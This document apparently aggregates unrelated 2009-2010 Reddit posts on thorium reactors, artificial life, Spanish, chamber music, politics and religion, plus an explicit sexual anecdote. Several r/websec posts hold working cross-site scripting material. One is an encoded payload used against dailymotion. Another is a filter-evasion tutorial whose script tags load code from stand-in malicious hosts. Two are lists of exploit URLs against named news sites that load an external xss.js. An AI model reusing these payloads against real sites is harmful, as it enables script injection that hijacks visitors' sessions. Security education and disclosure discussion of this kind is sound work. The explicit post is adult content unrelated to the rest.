Obviously stuff on the internet needs to be spread around for general awareness as well. | r/thoriumreactor | post | r/thoriumreactor | 2009-11-29 | Z0FBQUFBQm5IcUlYOF9hUC1iRVpycEt5RXFIVy15enEybDJabGMwTF9nZXRJS0xUa3ZYMFJLaXY4a0JtUHQ3WXRJNjRKQzBFNDNCdU9pM2JaUy13bUs4Q0EyUDJ3YVJsQ0E9PQ== | Z0FBQUFBQm5IcUowa1JlMENvaVA5ZnJIM2lTcS14SzBhcWYyNF9FQS1vUExUZ2ptNlFfZllYY0tCSG1lbnhSa3dGM3d2Yk96bkRPOVc1cWRaTFBVUUhrRDVzUXBtV3Q5STNVUk9ueE5qb1JuZzc1TnZFLVdFMzRvX3ZTYnlrVF91Vzl0Y1g3T2d0ZlhmWDU1MlNqMVpzcVdYRkFIYUwzdVhmdGFBcExURWF1ZWROMGRvcXNSMWxJPQ== |
Building an entire nuclear reactor is a very hard thing to conceptualize all at once. So here is my understanding of the pieces we would need in order to have a LFTR.
1. A storage tank of liquid thorium solution, with a pump into 2
2. A staging tank of liquid thorium/uranium solution, with a chemical uranium extraction mechanism and a pump to and from 3
3. A breeder reaction vessel, with a thorium solution surrounding a uranium core.
4. Uranium storage and pumping mechanism to rotate uranium in the core
5. freeze plug and drainage tanks for safety.
6. Sufficient radiation shielding such that this device doesn't kill people.
Am I missing anything?
edit: thanks for the reminder
7. Heat exchanger with steam or some other medium (generating power is straightforward from there)
8. a plan for long-term disposal/storage/handling of wastes. | r/thoriumreactor | post | r/thoriumreactor | 2009-12-02 | Z0FBQUFBQm5IcUlYUG5NZHBwbVJCU0FlcWlEOEg1UE8weHlUc1dERjlmaS1aUFE5Z3NhNmhDQmFVRExQb0o4d1o3NnNtTHpjV0xKXzIyXzdIT0JJRUFKb0hvdjdxY3Rib1E9PQ== | Z0FBQUFBQm5IcUoweHZSNzk5T3BfNWVma2xzZVNzc2c1akNtTktmTlU3eFlFYVhia0xiWUlWVUUtdUlSMVJES0ljb3VMRHNSODRTelM1MDBFOUtBVmhPd3F5VDFyUVRnWldmQnllUHBXek5OaUVGMTdSQlZjdmpCblBHeFhPRC1aTlF1WThiLVlNMDViZy11Uy1Lc1JxUVdVODFGNWN0SkRsRFNMMGpqS3hhZnNtRjRKd1hHdVlYTVpzNHRiMU56MzhUdDJNSFQ3SFNXNzItNm9hdnRXUEVSbnQtOExiQnM0QT09 |
One thing that has bothered me about the Molten Salt Reactor/Liquid Fuel Thorium Reactor technology is how obscure it is. It seems that very little work on it was done after the Molten Salt Reactor Experiment and until the Google Tech Talks in the last couple of years, it has received almost no media attention. I am an Ph.D. student in engineering that reads science and technology news and books constantly and wasn't really aware of it.
I had read about [Generation IV reactor proposals on Wikipedia](http://en.wikipedia.org/wiki/Generation_IV) a number of months ago, but the Molten Salt Reactor design did not really stand out. Admittedly, I am not an expert on nuclear engineering, so simply reading the page about a number of nuclear designs drowned out the advantages of the MSR to me. It wasn't until I saw the summary of the Google Tech Talks that I really understood how Molten Salt Reactors work.
Either way: I think this problem is pervasive. Very few scientists and engineers really know about LFTRs well enough to understand why they are a great solution to our energy needs. Therefore, what we really need is the larger scientific and engineering community to know of, understand, and independently evaluate the LFTR design. If we can get a critical mass of scientific experts to agree with the assessment that we have made, then this stands a much better chance of getting the research funding it needs to develop a commercial design. We aren't going to get a large DoE, DARPA, or NSF grant directed at Thorium until we have a consensus of scientists (or at least research program managers).
Therefore, I think it is essential that we form a list of key contacts in various organizations such as the Association for the Advancement of Science, the National Academy of Science, the National Academy of Engineering, the British Royal Society, the National Science Foundation, and so on. We should send them the information they need to independently evaluate this technology and ask them to have their members do the same. My hope is that this can plant the seed for generating massive interest in this topic (as in an article in Science or Nature, a New York Times article, a BBC or PBS special, etc.).
On that note: Another great thing to have would be a short book (say 200-300 pages) that discusses and summarizes the details of LFTR technology and a plan for how to develop it to be ready for commercial use with realistic cost estimates, time frames, and regulatory actions. Combined with the tech talks, this type of thing is key to getting people up the learning curve quickly. The book also needs to include the larger historical context (e.g. why nuclear doesn't provide 100% of US energy right now) and cover the fundamentals of nuclear engineering and the energy needs of present and future society.
After learning about the technology, I strongly believe that the LFTR is the right solution to provide base load to replace coal and natural gas in the power grid. I believe that if awareness of this design was achieved for the larger scientific community, then many more will reach this same conclusion independently. I know that a significant chunk of the scientific community is already behind nuclear technology as a way to deal with peak oil and global warming, and I am sure they will be happy to know that a design exists that can reduce or eliminate many of the major disadvantages of previous nuclear reactor designs. | r/thoriumreactor | post | r/thoriumreactor | 2009-12-05 | Z0FBQUFBQm5IcUlYeU5SRVVTV0F3Z2JleDZlVWVhamUyQUxOUkowNVBmY1FqMkJMWHdwTTNIaDFMSVdsUHdfRVpMVkJSTEFWZzlMRV8tc3R0eElQSDdWdVcxYTJCVkc3dVE9PQ== | Z0FBQUFBQm5IcUowbWJaN3p1Q0Z3V042b2R1NTEtQ0ItQ0gtbzVsV2F5UEhBdDZqX0tZWDZNSTM5d2d0VHJCSEJyMzA4UksydWtCQ2Z5RkpJcmZqeFkxQTJVdENHZlVwR2RXLTQtUWZuWm0tektNTVl5eWRSWHZEaUVfTkRYSlB6Nm5oSFk2cnFZN05QdWlDYkI4V3RhLWdkUXBEelA5dm50NkhaYl9aWmNMWlhXcXpkaUo3NXIzTU8wY0t0VHFLYWNRNzJjNHhuYkN6QWdWbDA3ZUhBOHBHMVdUcU13NnlCdz09 |
I see this is a very quiet subreddit, unfortunately. :(
In hopes of perhaps bringing it (artificially?) alive, I'd wanting to see if anyone reading this is actually doing anything related to alife? That may be just doing long-term runs of an existing software package, playing around with such software, working on something in spare time, etc.
I know I've been doing some initial design work for my own artificial life system. I want to to it in the vein of Tierra/Avida - and have been just tossing around other ideas for things that I think might put an appropriate variety of pressures on them to further push evolution. Perhaps some sort of variety to their environment, where there's various combinations of how available energy is and how dangerous the environment is. | r/alife | post | r/alife | 2009-12-08 | Z0FBQUFBQm5IcUlYWnVxcXhjZHcyU2FQcHVLRGEtOV9WYkZPTktKNDN1YVE4YTF2MkZnVkxuaTU5TWFKZDB4ZWFCN0k4WFRsU1NxOXAzYV9RLVJxN1dVVDRNQ044QVVfRFE9PQ== | Z0FBQUFBQm5IcUowUlQyam0wREhPZTVYbTNYM1VYelRWNU84dkRPbmVUNGtaMUlHT3N3eDhqalRFengybmJPb3JEcmN2dlh3SWZhdmM2OG5BS3J2eV9RZVMwQWhVWURBLWJrNXZGSlIwTk4zXzhxbmdMTHoxMHR1YVR3a2lrcFpMb09GQ1RFbm9SQ0t1bk9uN0g2aTNJcnI3cElPZnFLUGxOWUdQR2F2cjJHa2djdTV3ZnBIQVBpdkFZcEpZdXVLM0NGanZ0dGluVHNKbmMtZmRyV0haeU9LSXJoRFRRc0NIZz09 |
with little to no $, some $, or a lot of $? Fastest way? Most intuitive way? | r/lanl_spanish | post | r/LANL_Spanish | 2009-12-08 | Z0FBQUFBQm5IcUlYc0UyYzE1Z3dIVG1IUUhwOXFFN1dfUFpLYkJoRUE1MHNEaWh0MjRXdHlSY3Y3WHlUV0hJRGx4bVRlUDYtdlVkMWhmOEtnbWZPZlBBZF9oSFVNcUF5UUE9PQ== | Z0FBQUFBQm5IcUowbTF1enRSb3BOWVFqaE9xa0xhSVRpdHdKWGppaEdibWFZRW5pd2d4Y0c4bllKaXRmQ3l4WkkxWDlCSUhKNmJVS2VBRHpSOVZOSDJaSUozS3lfUGJNdGN0dzZ0eHRUeHN0clFGbEppMEVCd05keWc3TTdVN21oWkFqZHdaakJoZllObmJZcVBMM0VtVTZ5bkdRaWJ5MF9FdjJ5T0pnNHVpU21pc19fYWVHSmxtTnBseEFZTndiUjFRMmJiZWFqRXkt |
[Frozen Vodka](http://imgur.com/EGUb1.jpg)
[Crappy closeup of crystals](http://imgur.com/9VJG4.jpg)
The vodka needs to be chilled to around -27c, [how does one do this?](http://imgur.com/Azdye.jpg)
[To you Reddit](http://imgur.com/R1ERP.jpg)
I woke up to a -40c actual temp this morning and asked myself - what can I do with this. | r/madscientist | post | r/madscientist | 2009-12-12 | Z0FBQUFBQm5IcUlYWExqbVR1RVlzMEVTaHgyU2F3NTBFZkJxOW9SdXZSQTFGSjNxRUs3UHJfa05PV3BuMEt4MjVBLXBpSTdxSm13VjZqbURibGtWMk9mZTlBdzV1Z0ZLNEE9PQ== | Z0FBQUFBQm5IcUowSElRZHVpaTFTd1Qyc09zQmVJX28tcUE5d05IdTRwS0k5TXljMUlvT21UZTItSFpBVmFXV3NpYUg4a0JVRFJsTTBxUG8td3F3ZDdIblFrc09KbUpXVmphcDBObHpBREdRWWlOZkd6LUM3T3NwdUhKcUdBY045TXY1WEFFZkpPdW9IZWtJZTYtU3JudE5lWVd5SjA0NUJBU0xUeENwcUlRU3NhTlVROHNCbFRNc3ItLTFlM05ZcDhyRUxqUVFGSkNTRFFGR1Nid3dZQzMzRFF4OVpFTzBkZz09 |
[My original xss exploit](http://www.dailymotion.com/relevance/search/%253C%252F%2574%2569%2574%256C%2565%253E%253C%2573%2563%2572%2569%2570%2574%253E%2561%256C%2565%2572%2574%2528%2527%2578%2573%2573%2527%2529%253B%253C%252F%2573%2563%2572%2569%2570%2574%253E%253C%2569%256D%2567%2520%2573%2572%2563%253D%2522%2568%2574%2574%2570%253A%252F%252F%2569%2573%252E%2567%2564%252F%2535%256D%2568%2553%2579%2522%252F%253E%253C%2574%2569%2574%256C%2565%253E) was their search url with my script as the query, here it is:
The script on the end of the URL is actually hex encoded twice because, I'm not sure why or if this is even it but, they seem to be removing non-html encoding hex codes on the back end, so encoding the hex encoded trick *did* the trick before. Any way, the script in the url decodes to:
http://www.dailymotion.com/relevance/search/</title><script>alert('xss');</script><img src="http://is.gd/5mhSy"/><title>
I used is.gd as my image source because I had limited characters. Anyway, I was escaping the title text to insert my script. So to fix the exploit, instead of just running the input through html entities before placing it in the title, they just decided to remove the title altogether from the no results page. So now the title section is just <title></title>. Made me laugh. | r/websec | post | r/websec | 2009-12-15 | Z0FBQUFBQm5IcUlYUWRzb2Qxa0NTUS1vaGRmNHh2Uk9qa0I5U2c0aGNBNDcwcnYzOEFEU2NsYUp3Rk9tRmI5OXh6QlBQOW1XQzNOOVNBVHBZVmJQUlNnWk9vSGp1TDVJeGc9PQ== | Z0FBQUFBQm5IcUowbHlJUkZTNEhCazk5akIyQklmNi1fZERsMFdydHI2UHUtUW92R28tdFZLUThtRUFYaC0yRjFsLUFzazNxcUQ1UFlwUjd6RW9BdFE4MDV6MHFHQnE3Sm1RSThQWVRWQmxkRjVibmpzTm5lTkhkMkEzMGtIU3h4QzRnaHAwVXdjT05JM2ZQeXBLZW9nbERESl94RXhSQXJrdFZzbl9CQy1Cc0NuYlY3YXA1SWFaM2RCOW1hTEU2NWo4ZFpQMjBvbmp1 |
First of all, we have what I would say is the most important string of them all, this will be your mighty sword for finding XSS exploits:
This string has every character a well protected site **should** be filtering. To test a site with it, enter it into some kind of site and then see what the output is by seeing if the '<XSS>' part of the string shows up in the source code as '<XSS>' instead of something like '%3CXSS%3E' (this is filtered and is not exploitable).
Hopefully, if you find a site that is vulnerable (does have '<XSS>' in the source), this string may break something on the page as well. Always view the source to find these breaks, as they won't always be visible on the page itself. Here are some examples of common breaks and how you can exploit them:
<input maxlength="2048" name="query" size="60" title="Search" type="text" value="'';!--"**;<XSS>=&{()}**">
Here the double quote escaped the value in the input form and placed our query onto the page. Now, to exploit this we can simply start our query with ">, and the page will be open to exploits.
<script type="text/javascript">
var userInput = ''';!--"<XSS>=&{()}';
Now this one does not look exploitable at first, as it doesn't break out, but it is if they don't place backslashes in front of your quote marks. It also wont test as vulnerable if you just try a query like:
This is because javascript recognizes which quotes are the ending quotes and which aren't. To achieve the result we want, our query will need to start with this:
This was, the original javascript is over ridden and when we open a new script tag we are able to insert what ever we want.
<title>Search results for vulnerablesite.com | '';!--"<XSS>=&{()}</title>
Again, this query won't break out, but if the source says '<XSS>' in it, it is vulnerable. What we do is start our query with this:
By closing the title tag, we have escaped the title which cannot execute scripts inside, even if the script tag is supplied.
**False positives:**
Sometimes when I'm searching for '<XSS>' in a site I've tested, I get excited when I find it, but am then disappointed when I see something like this:
<script type="text/javascript">
var userInput = '\'\';!--"<XSS>=&{()}';
<script type="text/javascript">
var userInput = "'';!--"<XSS>=&{()}";
Both of these are false positives because, although they contain the <XSS> tag, they supply no method of escaping the quotations wrapping the expression.
**Filter evasion**
Sometimes, a website will attempt to protect against XSS exploits, but will do a poor job at it. The ideal method to protecting correctly sanitizing the user's input when being output back onto the page by using something like [PHP's htmlentities function](http://php.net/manual/en/function.htmlentities.php). Inexperienced coders will do a combination of three faulty methods. They will do:
1) Straight up remove certain characters or strings from being processed. Many sites just will remove the '<' character, or any string between '<' and '>'. Other sites will attempt to remove quotation marks or '/' marks. Both of these are bad methods because any person experienced with finding XSS exploits can create exploits without them.
2) Filter only when the input is sent through the search box, but not through a get parameter. Example of this would be me searching the string '';!--"<XSS>=&{()} in the search box of the site and getting the the url:
This happens a lot, and if I see a site do this, I immediately try pasting the string into the url. Then, it will come out as:
If I do this, and their filtering method before was their only protection, the site is now vulnerable
3) Protecting against only certain ascii strings or characters. For example, many sites don't allow the '/' symbol, any quotation mark, or the string '<script>'. Usually, if you replace your query (in the url, not the search) with the hex code equivalent of query, you can evade this. [I use the hex converter on this page](http://ha.ckers.org/xss.html).
**Special strings to evade poor filtering**:
*The no quote query*:
*The no '/' character query*:
<body onLoad="alert('xss');">
<iframe src="javascript:alert('xss');">
*The no '/' character URL*:
var slash=unescape('%2F');
var url='http:' + slash + slash + 'malicioussite.com';
[\*Note I just found this today, read more about it here.\*](http://www.reddit.com/r/xss/comments/aeos5/ebaumsworldcom_xss_vulnerability_interesting/)
*The no quote external script or image*:
<script src=http://maliciousscript.com/xss.js>
<img src=http://imagesite.com/image.jpg />
I hope these tips have helped anyone who read this, too learn more obscure techniques like I mentioned, check out [ha.ckers.org's cheat sheet](http://ha.ckers.org/xss.html). If you have questions about anything I mentioned or if you would like to add to what I said leave a comment. If this post is helpful to enough people I'll consider writing another more advanced one in the future.
**EDIT**: Damn you grammar. | r/websec | post | r/websec | 2009-12-15 | Z0FBQUFBQm5IcUlYVUl6MU9ScDE2encxa2pYS01Cc2JGdUhOeVh1NHA4ZVc0YXhTRXpQbHR0ZUJQWDhueFNLSkdJTUREUS1hdzBUVUVhbWktaGJUSjByeTVkVkZGWllzc0E9PQ== | Z0FBQUFBQm5IcUowR2tvWHZESUgxa1k3b2pHdGtLMWtLNWZpam5iNXB5OWFVbGNzS1ZYVDBaQ1ZjZDlJSTJ1US0xQm9fdlM0YzRxVkk1bVdza1dmWGRKZFJheVZKOUZWSmZnenlMc2ZlbVNuandsTS1FdEhxR2lFT3FsbGd6NU1MUTlwY3I3NTlpN3diX2pLQlVpZHFlYlpvdHlEcTNRQzhRaUhyYjFsb051ZEtGbXVBaXd5MHNGRW5zOUdEMDhMSlFzejg2TU5Qb3ZCR2dCNmtJSWdEb3RoNXdUdnVxOXJLdz09 |
My ex and I were hanging out one night, and seeing as it was difficult to have any sexual interaction at either of our houses (we both lived with our parents) we decided to go for a drive like most nights, get stoned, and fool around. He had is grandfathers car this particular night might I add.
We drove around for a while looking for a good spot which was secluded and where we were unlikely to get caught by the cops. We ended up settling for this area where we usually met his dealer to grab, which was the back loading dock of an old warehouse which had been broken into the last time we were there.
I was pretty sure this place was abandoned so I was cool with the idea of having sex behind the building.. i didnt expect to be doing it in the car... his GRANDFATHERS car let alone, but he eventually convinced me it would be fine.... He backed the red buick into the loading dock, and we both hopped into the back seat to begin fucking. my legs started to cramp from kneeling on the back seat. he suggested that he stand outside and i lie on the back seat and he would eat me out for a bit and then bang me like that. i was cool with it, and we proceeeded. finally we both came, and i started to get dressed again....
in the process of puting my shirt and bra back on, i started looking up and around the building to see if they had fixed the windows that had been broken or if they had fixed the parts of the buildin that were falling apart.
Apparently they had, and apparently a security camera had been installed that was pointing DIRECTLY to where my ex and i had been fucking, with a clear view at my naked leg spread body. Im sure we were the excitemnent of all the people in the security office for a long time to cum.... literally. FML. | r/lastnight | post | r/LastNight | 2009-12-15 | Z0FBQUFBQm5IcUlYdDZSdXRrUW1ma0NYWXIxY2x0ejRQcmZWMmVDYzRweTluOG9qWmZxLWprN0R5MHZpTlB6SXc3U19xWXRiRW9JUmFZdXduNHVnc3BmeGs1a1Y4c3Rpc1E9PQ== | Z0FBQUFBQm5IcUowbk5tTGV0R2J4Z29jVkd0QVlHaDItSDhacmo0SDRaeDNudkgzWV9wbmZ6Vklaai1nVTY2aUp1TDZnSG4wY0RUUGlXeEZTeGVqUzY3NXBBTUM1YzYzQVZ6NlVsTmZ4R3RPMXpHT0VJOHN1Q3haTHV6TWNBVTlEOVh3LUVHaVlKR2VHbGdyVkJacG5YUGJmcWd0MnpNSk1CZDE4OUVKU1FOUUZtWUlFTjZBWnNPbDVsamQ4SHg3MjRZdEdwaUhDX1ZL |
TED is widely known as a really good place to get upcoming tech and ideas out there. Similar to the google talks (I assume), a major proponent of LFTR / MSC needs to present. Stuff like this gets the ball rolling. | r/thoriumreactor | post | r/thoriumreactor | 2009-12-16 | Z0FBQUFBQm5IcUlYemRXa182ZHg3X0hDcDRPVnBLM0VzRlVfUEQtZ1pFd1lvdEd4RWlMM0tPSmdtZUtnOFpqTlBodjN5RTRmS0JwZHFzYlJnWHlCdWh2SkdiSmhrMlpHbUE9PQ== | Z0FBQUFBQm5IcUowRzgxdWhfaTZzZkdNTGZvTHVrVmc4X1ZfUHhFeGxhejZVNHBhZFhCaFZ5b0dBdzFHMVRFWmRvUUt1bHh2VmhMTFF5NlBXdVBJcjlGVEtXTzY3Xy1RbWlRY2Jyb0s4UUdPWFctV1RBeWtXTFdIOF9GRmlFT2psOVZUSWJsay1tZm9sLVBIdVpiTEhuTDNhWk5vNWlkZXpnPT0= |
I thought I'd share my experience from today volunteering for the campaign. I [signed up](http://wildfire.schiffforsenate.com/an/landing) and began making calls today.
* 6 messages left
* 2 'not home's
* 1 'I'm not interested in politics'
* 1 person genuinely annoyed just to be speaking with me
Not bad for my first time... I think.
In each of the 4 cases talking to a live person, I mentioned I was volunteering for Peter Schiff's Senate Campaign, so at least they heard his name and that he was running for Senate, and anyone who listens to more than 3 or 4 seconds of my messages will hear the same thing. And that's what we're most trying to accomplish at this stage of the race, name recognition. I'm hoping to get an engaging conversation going at some point, or at least a question or two thrown at me.
I hope they do something about that script though; it sounds so cheesy over a phone call. So does the voice mail script. It needs to be something a little more casual in order to sound more natural to say over the phone.
Anyway, I hope this post has encouraged others to call, or maybe to share their experiences. Perhaps we can give each other some good tips. I'd also love to hear about a call that goes well. | r/peterschiff | post | r/PeterSchiff | 2009-12-18 | Z0FBQUFBQm5IcUlYekNBSnUzR2g1X1ZjaUwyWFl4NHByczVrOXJtZDNTMGZ0eVg2MWNCd2E1eHlYZFpxSWJyWFU1WDd6emZLYnFNZVdCWkxoTk9kdHpGNm5kVzlrOFdVWVE9PQ== | Z0FBQUFBQm5IcUoweWpTMmtOeFVaT3NhWDZ0T2QwbGtrYVoyM2xKNnFqOS1SaGxLeGU2UnNaZ2ZjQVl5Zmg5Q3ByTHUzVGs0M1JTVkZhWlJ2bjFONGMyQjVUU0dDY2hXazR2WXhlc3VuRVkzVlIxbXZaNWlITmV1c1JsZ0NlZUhOZVFlU2Z6X3gxM1BkQzhoekx1WEpuT3V3X3lOdUdlUU91bElTZXNSUTVIc1hiMnNlMXZ5akh3NDViM0R6eWNWNTFIMFgzSHFNZzV4aVBoQTd1NTFBdnlLRnNrUmdVYVVmUT09 |
We should set up some guidelines to make a model for disclosing vulnerabilities. Things like time to wait after disclosing he vulnerability, whether or not to censor the data collected (obviously yes for passwords etc) and the injection points, the way it was discovered etc.
I propose that we:
* Disclose the vulnerability to the webmaster and wait a week(7 days) until disclosing or until it is fixed.
* We should post the email conversation if there is one, especially if it is interesting.
* Include the injection point and vulnerability
* We should include the server banner (if found) so that we'll know which software would be more or less vulnerable than others.
| r/websec | post | r/websec | 2009-12-20 | Z0FBQUFBQm5IcUlYYTAxajN2X3RYVFlUZG5qMWc0ajh4WVNobnpudTVYR1Nza2xyRUhZTmwzSUE3RklOU0VRQWt5Z2pCQ2FaNHBOQkh3MzZEbUJfNXVnOGZNVW40XzlvSFE9PQ== | Z0FBQUFBQm5IcUowOEU1NnVkUG1XeVFjVVplLWhmNXlZd3pKb2dTMGtRRXkwSjNheGxUcWFqNnNBaUtSbV9fcDFVWUNiOUo2LV84dEhxMGZIc2gxWHRMYnRzWnJzV0ZIS0xUNzJXZTRzUjllT2I3TVJOa3QyWkg4czNGTWRQR1doM3MyZkk4LUg3WVBGekgtdEduNDVfV0h2bEZGUEZObnZ5VkY0Q3M1dEtGa3RTUzJfa0pZdlowOUFTSGZGdzlMM0Ria243NUgxcVp2 |
Last night my family was discussing going to church on Christmas Eve. They are Methodists and I never really felt I was getting much out of church. I even went to Catholic School. Maybe thats why I am screwed up. LOL
Anyway..I don't want to go. Just don't buy into it anymore. We are at war becuse of this god bullshit. My god has a bigger cock that yours mentality. Who fucking cares? My daughter would go if I pushed the issue to keep the peace but I am 46 and don't beleive in a supernatual snufalupigus in the sky that protects you from Earth's boogey man. I believe in evolution and that we adapt and grow with our environment. I watched Joe Rogan last night and I don't know if it was a schtick or something but he made sense in that we are supposed to beleive thousands of year old bullshit stories?? C'mon?!. I do fine on my own with the abilities I have used to be a good dad and provider for my family. God did'nt do shit. So how do I tell my parents and siblings I am not going to church EVER. I am the black sheep so it should'nt be a big deal. Whats your take on this please?? | r/lastnight | post | r/LastNight | 2009-12-24 | Z0FBQUFBQm5IcUlYa3JYb0xLNlpOdWZveFQ0U3FJRXpVN2lqOVktcmp4QmVEcVpTLW9lbVVmRWJuZEJSTGU0T21wSE1UNWpkbzZiZzFlc0ZfNk1kQ3pHR3hacGlqWEhfUHc9PQ== | Z0FBQUFBQm5IcUowVGJaR01DM3EzSUotSzQ2VWtpUFdPT2VFeUtnckVfc3lfdi1tSG40czJ0X0JsLWdYS0d1aFUtMUpFb1YzRDNjbkZDTWpYOVF4M002R1FRY0VwQzFwQ2ROaGxrT0RDNUgtdTNCVEJuZXh5R2xyRUhvSnR0Qll5blh1OXlRdHQ2OGRIWUZibHhjRHdSWlpJblEtQ0lCSE9ZTkh2dU1fX1luMmFWdnhVT1VLenk0eEd6bWxZNDZFa1FqSVVYNjJKc09IN1N4bjBieFM2eEpfMHY1VjhwdzZIQT09 |
Fun times!
Edit: I know there are at least five of us in Amherst | r/amherst | post | r/amherst | 2009-12-29 | Z0FBQUFBQm5IcUlYY3duLVlYRHNhaXBRMmota3RvN3JSZzBpUkJKQmxlcjdtaGg1NFF3V3BzM19VLUNlaVcwSmZBMzk2V0dRNlBiV1JTT3hzZFBrc1gzQ251UXpuTExjQnc9PQ== | Z0FBQUFBQm5IcUowRU85S2I1VjZsZTZ6MGZrU3B6czlxRUUzUi12ckF0cXQ0akJHUkxUVENnUVlrSFd0emJadmdJSHlxQ1lSU05vVjkyZnJQY1BlS1Fka3IwOENibV9GemtVRHZoanFEc0s4X3dmcS1sSzRRRzVkTUtydTAzOU1iOVg5SjdtTEJTbFJZeHB3THRJcGpXQUk3MWQ3VERDOUgwNnpMV1dJejVXdmZhemRtSTJXaFRUMWM1SHlaOUhHRjJ0ZjlGcHFTNW9q |
(please feel free to correct/critique my weak spanish as well as answering the question. iNecesito practicar!)
Hay una carreta de comida cerca de la universidad que se llama "Fernando's Mundo Fiesta". Claramente, no es correcto porque a menos " 's" no existan en español. Pero -- "¿Mundo Fiesta?" Me parece debe ser "Fiesta Mundial." Es correcto, o es traducido literalmente del ingles "World Party?" | r/lanl_spanish | post | r/LANL_Spanish | 2009-12-29 | Z0FBQUFBQm5IcUlYa295QWdHY2I5SjJkTk5oZ1B0WC16SDM1TkxHdkY4Um05em0xOXhvMWZrQTItWGg1WWlwNldyR08ydWpBRVFzMkNDRHRVYUZjampUWjdTVkZKSGRnaGc9PQ== | Z0FBQUFBQm5IcUowUEF3NFRwRXNqRmpSQmp2NXVRa3pXY2NvblF4NWJjM1AxWHlxa2NKamh1TW03OWhNSkxCcWpOdktGeHVMRGxINWJnRURFQ2dtQlZIb3NqTVNLUzBqNExMRHRfVFFObGVtR214VkotNjJ2a1VWWHltbTBmVnFGVWV3TTgzY0l1ZGZsU1N2YU81R3BoTGczNkdsdzBBYWlxc1RISlE1RWtMcVBJM3QtM1k1NmtJPQ== |
Aaah, the other posts set the bar so high I almost didn't post this :P
I wrapped my scarf a little weirdly. x_x Still kind of bugs me. | r/waywt | post | r/WAYWT | 2010-01-02 | Z0FBQUFBQm5IcUlYWnR6NVpaN18xSFVJZURDZ2czOEdUSi1OeEVEQWhOUUlfWGNMNlRENS1zaHFmRENNQU1qbkpjckFjd1BmeHEydm5aYl96NzRQUlNRc2xMVS1kZ0EtVVE9PQ== | Z0FBQUFBQm5IcUowLXk3M3ZFYnZBMmZPSnlBZUxDUXNWWVRaM0xsdGljTy1oQ0lNM0Z6Z0Q5ZFNZUVBhTk1aQWhQZ0lNR2ttUG1EaG5LckxDRURwdUVvOWpzR3BBVTRkSWR0cXM3Z1BlZzVISm1pbkVZa1NETVVHZFdEc0kwWTFIQ0ZIZnpLbzJRNDN1N25wcW9xaTktUmhxc2RiTUZUaUlkbEFUM19iYjVOdXk1aHV1UktlU0l2QmRlNjdPVlFrMHZZLUNWVktJa00z |
thanks a lot! haha | r/thenandnow | post | r/thenandnow | 2010-01-04 | Z0FBQUFBQm5IcUlYRS0taHBidEwtdjF3N1FiQ2VoeTFkNzhwcERwYll4ZW8zNDUwQV9XeENWUWMweV91UnZyeHVlaE5KZGM3U0Rud2V2bl9mcVRDZjFhYjlXc2lUZjF1SHc9PQ== | Z0FBQUFBQm5IcUowSkFXNDlWcjc1UFNuVi1YSTZ4NTJvSHVZTTJsTlV0NU1jbGlrLTNzRUNfWXItS0JCNTZnTW5qQXVvcXo3eHRXOHY5QmFuMWJqeEQxMkRFd29xYW9iWWpCbXJsNTdYa3dGMDM0UUM5OXUxSUE4STBIME9BRU1qRlFUNmFnTWxpcVBjU0g2cmdUcnVJRUh0dEM3YVdVWG1sdml3NUxEWU1abEF2NmNXMXBzUHJsSHRCZGRkWllxTFVHVTFTS1BTV0thbVJjMkwyS0RlUnNTdHVGSFU5RE94Zz09 |
I am personally a part of:
[Chamber Music America](http://www.chamber-music.org/)
They have a nice publication and a good link email. They have many grants for local chamber music societies and their magazine is a lot of advertisements for touring groups.
[International Double Reed Society](http://www.idrs.org/)
This is an awesome organization. They have a best quarterly magazine around (reviews for sheet music and recordings, reed things, biographies, and info on contest, etc). Their website has an incredible area where they have the Danzi and Reicha WW5 sheet music in pdf and finale format as well as the Brod and a couple other oboe etude books with the accompianment in midi mp3s. I joined because of the charts and I've stayed because of the great magazine.
[American Composer's Forum](http://www.composersforum.org/)
If you are in the MN area their workshops and events are top rate. They are always having salons and support the fun group Zeitgeist and many local artists. They have a newsletter as well as a very nice website for your bio, networking opportunities and a large and well-updated listing of commissions and contests for composers of all ages and skill.
**What are you a part of?** | r/chambermusic | post | r/chambermusic | 2010-01-05 | Z0FBQUFBQm5IcUlYRXRQaW1waHFrVEdfZ2lmZl9SQ3NfWG9JYU5zbGxsb1JuVzNjMHlCd2NGa012V3ltSjFydEItcnFfYlp3S20xdXdRV2xyMzV5MGxxaHZ3QnhkT0psTGc9PQ== | Z0FBQUFBQm5IcUowS3ROZjFSWjhKMUJpc2c1Q21yUXIxRTktY0RMM0NTamdONmZQR0ZCTDJmanl6OHBVU0ZyN3BHMkU4YjdpMUJGbU1iMGxpT1g0WTBrcUlTN3EwVS1xb0RHYlg4RHlvWEt4bU1kNE9pb2lUeUlWQ2JmVlA4ZjhiaHc2bTBNVUEtYmJiN0ExZFVpLXVGZ0hsY0g2d3ZfMlBQMGgzZmY4MVhzbmw2eHgtSFZpbU5fdXZVa25qU2ZmdXBqR0VDdUgxQlZYVUMzaGgtWUlUVzEtT0hicTJYYkdqdz09 |
All these sites use the same engine, so they all have the same vulnerability.
* [Gizmodo.com](http://gizmodo.com/tag/"<script src="http://www.yourjavascript.com/07920020021/xss.js" />/)
* [Lifehacker.com](http://lifehacker.com/tag/"<script src="http://www.yourjavascript.com/07920020021/xss.js" />/)
* [Gawker.com](http://gawker.com/tag/"<script src="http://www.yourjavascript.com/07920020021/xss.js" />/)
* [Jalopnik.com](http://jalopnik.com/tag/"<script src="http://www.yourjavascript.com/07920020021/xss.js" />/)
* [Jezebel.com](http://jezebel.com/tag/"<script src="http://www.yourjavascript.com/07920020021/xss.js" />/)
* [Deadspin.com](http://deadspin.com/tag/"<script src="http://www.yourjavascript.com/07920020021/xss.js" />/)
| r/websec | post | r/websec | 2010-01-07 | Z0FBQUFBQm5IcUlYdGRpcmJmcGdKZWpyV3pKRzh6Q3ZsXzFMX1hJTHFac0otWENLYXZMLVA4VU9FUEdaZ2JqWmlITHlEa25uZHNmUlpoLW1pNHVjYWxOTEJhdnhXeUQ5RXc9PQ== | Z0FBQUFBQm5IcUowVWJFTmh0X1RFSWYwNUxNUDhCVWtRMFNjTnRkU0ZKSndrM0p2U2FNTllDOGxObHg1b2N6WGliSmhLMmVSbXA3WHpzRmg0YzhKX0UzbHF5bldocXgwLW8ySGl0LVZHUWNySWpDeGsxUk42ZHJJM2tRd2dBNi0zMG5BWnlJVGIwWk0yNGFoX0tvS1ZKLTJ2cWtpYWxqbnpYMm1pd3pqZFJteVlnRWdObXdCaTNsNm1TTDN1WFJwUG9qR29HY0RkQjhJ |
All these sites use the same engine, so they all have the same vulnerability.
* [Engadget.com](http://engadget.com/search/?q=';</script><script src=http://www.yourjavascript.com/07920020021/xss.js />/)
